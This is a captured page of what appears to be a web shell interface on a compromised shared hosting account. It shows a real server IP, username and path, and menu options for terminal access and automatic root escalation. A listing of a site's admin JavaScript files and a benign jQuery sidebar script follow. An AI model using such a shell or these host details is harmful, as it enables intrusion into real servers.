Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 52.15.122.33
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
ornolevaxo.online /
app /
admin /
js /
Delete
Unzip
Name
Size
Permission
Date
Action
chart.js
7.82
KB
-rw-r--r--
2023-04-17 05:33
dashboard.js
6.87
KB
-rw-r--r--
2023-04-17 05:33
documentation.js
835
B
-rw-r--r--
2023-04-17 05:33
file-upload.js
398
B
-rw-r--r--
2023-04-17 05:33
hoverable-collapse.js
806
B
-rw-r--r--
2023-04-17 05:33
off-canvas.js
185
B
-rw-r--r--
2023-04-17 05:33
tabs.js
974
B
-rw-r--r--
2023-04-17 05:33
template.js
1.96
KB
-rw-r--r--
2023-04-17 05:33
todolist.js
952
B
-rw-r--r--
2023-04-17 05:33
tooltips.js
809
B
-rw-r--r--
2023-04-17 05:33
Save
Rename
(function($) { 'use strict'; //Open submenu on hover in compact sidebar mode and horizontal menu mode $(document).on('mouseenter mouseleave', '.sidebar .nav-item', function(ev) { var body = $('body'); var sidebarIconOnly = body.hasClass("sidebar-icon-only"); var sidebarFixed = body.hasClass("sidebar-fixed"); if (!('ontouchstart' in document.documentElement)) { if (sidebarIconOnly) { if (sidebarFixed) { if (ev.type === 'mouseenter') { body.removeClass('sidebar-icon-only'); } } else { var $menuItem = $(this); if (ev.type === 'mouseenter') { $menuItem.addClass('hover-open') } else { $menuItem.removeClass('hover-open') } } } } }); })(jQuery);